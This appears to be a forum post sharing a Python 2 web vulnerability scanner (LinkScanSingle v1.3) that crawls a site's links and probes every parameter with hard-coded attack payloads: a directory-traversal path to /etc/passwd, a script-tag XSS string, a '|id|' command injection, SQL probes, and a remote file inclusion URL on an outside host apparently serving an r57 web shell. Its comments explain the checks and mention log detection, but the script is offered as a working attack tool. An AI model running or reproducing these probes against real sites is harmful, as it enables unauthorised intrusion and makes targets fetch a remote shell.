Jimmy

Python vuln scanner


Scaneaza dupa vuln LFI,XSS,RFI,SQL,CMD

#!/usr/bin/python

#LinkScanSingle will take a site and

#collect links from the source. If the link

#contains a = it checks LFI,XSS,RFI,SQL,CMD injection

#searching source (simple)

#If your going to use a different shell then the

#one I have supplied, you will need to change line

#54 (r57shell) to something in your shell source.

from sgmllib import SGMLParser

import sys, urllib, httplib, re, urllib2, sets, socket

# Process-wide default: every socket created after this call times out after
# 5 seconds, so a single unresponsive server cannot stall the run.
socket.setdefaulttimeout(5)

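class URLLister(SGMLParser):
    """SGML parser that records the href value of every <a> tag it is fed.

    After ``feed()``/``close()``, ``self.urls`` holds the raw attribute
    values in document order; nothing is resolved, filtered or deduplicated
    here.
    """

    def reset(self):
        """Reset parser state and start with an empty link list."""
        SGMLParser.reset(self)
        self.urls = []

    def start_a(self, attrs):
        """Handle an opening <a> tag; ``attrs`` is a list of (name, value) pairs."""
        # The attribute name has to be compared as a string literal; as a bare
        # name it is an undefined local and the handler fails on the first link.
        hrefs = [value for name, value in attrs if name == "href"]
        if hrefs:
            self.urls.extend(hrefs)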

def parse_urls(links):
    """Turn collected links into a deduplicated list of "...param=" prefixes.

    For a link containing N "=" characters, N prefixes are produced, each
    cut just after one of the "=" signs (working from the right), so every
    parameter position in the query string gets its own entry.  Links
    without "=" are ignored.  Relies on the module-level ``site`` for
    resolving relative links; the order of the returned list is whatever
    ``sets.Set`` yields.
    """
    candidates = []
    for link in links:
        equals_count = link.count("=")
        if equals_count <= 0:
            continue
        for depth in xrange(1, equals_count + 1):
            prefix = link.rsplit("=", depth)[0] + "="
            # Links starting with "/" or "?" are relative to the scanned site.
            if link[0] in ("/", "?"):
                url = site + prefix
            else:
                url = prefix
            # Anything that does not mention the part of ``site`` after its
            # first "." is also treated as relative and prefixed with ``site``.
            if url.find(site.split(".", 1)[1]) == -1:
                url = site + url
            # Collapse one doubled slash left behind by the concatenation
            # above, keeping the "http://" scheme separator intact.
            if url.count("//") > 1:
                url = "http://" + url[7:].replace("//", "/", 1)
            candidates.append(url)
    return list(sets.Set(candidates))

def main(host):
    """Run the five checks against one "...param=" prefix, in a fixed order.

    Order is XSS, LFI, RFI, CMD, SQL.  ``urllib2.HTTPError`` and
    ``urllib2.URLError`` raised by a check are swallowed without any output,
    so a request that failed looks the same as a negative result; any other
    exception propagates to the caller.
    """
    print "\n\t[+] Testing:",host,"\n"
    checks = (
        ("[+] Checking XSS", xss),
        ("[+] Checking LFI", lfi),
        ("[+] Checking RFI", rfi),
        ("[+] Checking CMD", cmd),
        ("[+] Checking SQL", sql),
    )
    for banner, check in checks:
        try:
            if verbose == 1:
                print banner
            check(host)
        except (urllib2.HTTPError, urllib2.URLError):
            # Deliberately silent: HTTP and connection errors are not reported.
            pass

def rfi(host):
    """Request ``host`` with the ``RFI`` URL appended and look for "r57shell".

    A hit means the response body contains the literal text "r57shell",
    which the header comment of this script ties to the remotely hosted
    file.  The request asks the target to pull content from that external
    URL, so the URL itself is the string to look for in the target's access
    logs and outbound traffic.
    """
    probe = host + RFI
    try:
        body = urllib2.urlopen(probe).read()
        if re.search("r57shell", body):
            print "[+] RFI:",probe
        elif verbose == 1:
            print "[-] Not Vuln."
    except (), msg:
        # An empty tuple matches no exception type, so this handler never
        # runs; errors from urlopen() reach the caller.
        pass

def xss(host):
    """Request ``host`` with the ``XSS`` marker appended and report a match.

    The test is a plain substring search for "XSS" anywhere in the response
    body.  Any page that already contains those letters is reported, and the
    search does not tell escaped from unescaped output, so a hit is a lead
    to verify by hand rather than proof of reflection.  Errors from
    ``urllib2.urlopen`` propagate to the caller.
    """
    probe = host + XSS
    body = urllib2.urlopen(probe).read()
    if re.search("XSS", body) is not None:
        print "[!] XSS:",probe
    elif verbose == 1:
        print "[-] Not Vuln."

def sql(host):
    """Request ``host`` once per entry in ``SQL`` and flag "Warning:" in the reply.

    The only signal is the literal text "Warning:" in the response body:
    a page that prints that word for an unrelated reason is flagged, and a
    response without it is never flagged.  An exception from
    ``urllib2.urlopen`` propagates immediately, so the remaining entries in
    ``SQL`` are not tried for this ``host``.
    """
    for payload in SQL:
        probe = host + payload
        body = urllib2.urlopen(probe).read()
        if re.search("Warning:", body) is not None:
            print "[!] SQL:",probe
        elif verbose == 1:
            print "[-] Not Vuln."

def cmd(host):
    """Request ``host`` with ``CMD`` appended and flag "uid=" in the reply.

    The match is a substring search for "uid=" over the whole response, so
    a page that merely links to a URL with a ``uid`` parameter is reported
    as well.  Errors from ``urllib2.urlopen`` propagate to the caller.
    """
    probe = host + CMD
    body = urllib2.urlopen(probe).read()
    if re.search("uid=", body) is not None:
        print "[!] CMD:",probe
    elif verbose == 1:
        print "[-] Not Vuln."

def lfi(host):
    """Request ``host`` with the ``LFI`` path appended, then again with "%00".

    Both requests are judged by a substring search for "root:" in the
    response body, so any page containing that text is reported.  Both
    requests are always sent, whatever the first one returns, unless
    ``urllib2.urlopen`` raises, in which case the exception propagates.
    """
    attempts = (
        (host + LFI, "[-] Not Vuln."),
        (host + LFI + "%00", "[-] Not Vuln. w/ Null Byte"),
    )
    for probe, miss_message in attempts:
        body = urllib2.urlopen(probe).read()
        if re.search("root:", body) is not None:
            print "[!] LFI:",probe
        elif verbose == 1:
            print miss_message

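# Script body: print the banner, read the command line, fetch the start page,
# collect its links and run main() on every "...param=" prefix found.
print "\n\t d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"
print "\t-------------------------------------------------\n"

if len(sys.argv) not in [2,3]:
    print "Usage : ./linkscan.py <site> [option]"
    print "Ex: ./linkscan.py Google -verbose"
    print "\n\t[Option]"
    print "\t\t-verbose/-v | Verbose Output\n"
    sys.exit(1)

# Fixed probe strings, appended verbatim to every collected prefix.  Because
# they never vary, they are also stable patterns to search for in access logs
# or to match in a request-filtering rule.
# Path probe; lfi() looks for "root:" in the response.
LFI = "../../../../../../../../../../../../etc/passwd"
# External URL passed as the parameter value; rfi() looks for "r57shell".
RFI = "http://yozurino.com/r.txt?"
# Not referenced by any code visible on this page.
RFI_TITLE = "Target"
# URL-encoded script tag; xss() looks for the text "XSS" in the response.
XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
# cmd() looks for "uid=" in the response.
CMD = "|id|"
SQL = ["-1","999999"] #Add more or change sql payloads

site = sys.argv[1].replace("\n","")
print "\n[+] Collecting:",site

# Default to quiet so that ``verbose`` is always defined: an unrecognised
# second argument otherwise left it unset and the first check raised NameError.
verbose = 0
if len(sys.argv) == 3 and sys.argv[2].lower() in ("-v", "-verbose"):
    verbose = 1
    print "[+] Verbose Mode On\n"
else:
    print "[-] Verbose Mode Off\n"

# Normalise the argument to "http://<lower-cased host and directory>/": an
# existing "http://" prefix is dropped and everything after the last "/" is
# cut off.  Only the "http://" scheme is handled.
site = site.replace("http://","").rsplit("/",1)[0]+"/"
site = "http://"+site.lower()

try:
    usock = urllib.urlopen(site)
    parser = URLLister()
    # The page is lower-cased before parsing, so collected hrefs are too.
    parser.feed(usock.read().lower())
    parser.close()
    usock.close()
except(IOError, urllib2.URLError), msg:
    print "[-] Error Connecting to",site
    print "[-]",msg
    sys.exit(1)

urls = parse_urls(parser.urls)
print "[+] Links Found:",len(urls)

for url in urls:
    try:
        main(url)
    except(KeyboardInterrupt):
        # Ctrl-C abandons the current URL only; the loop moves on to the next.
        pass

print "\n[-] Done\n"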
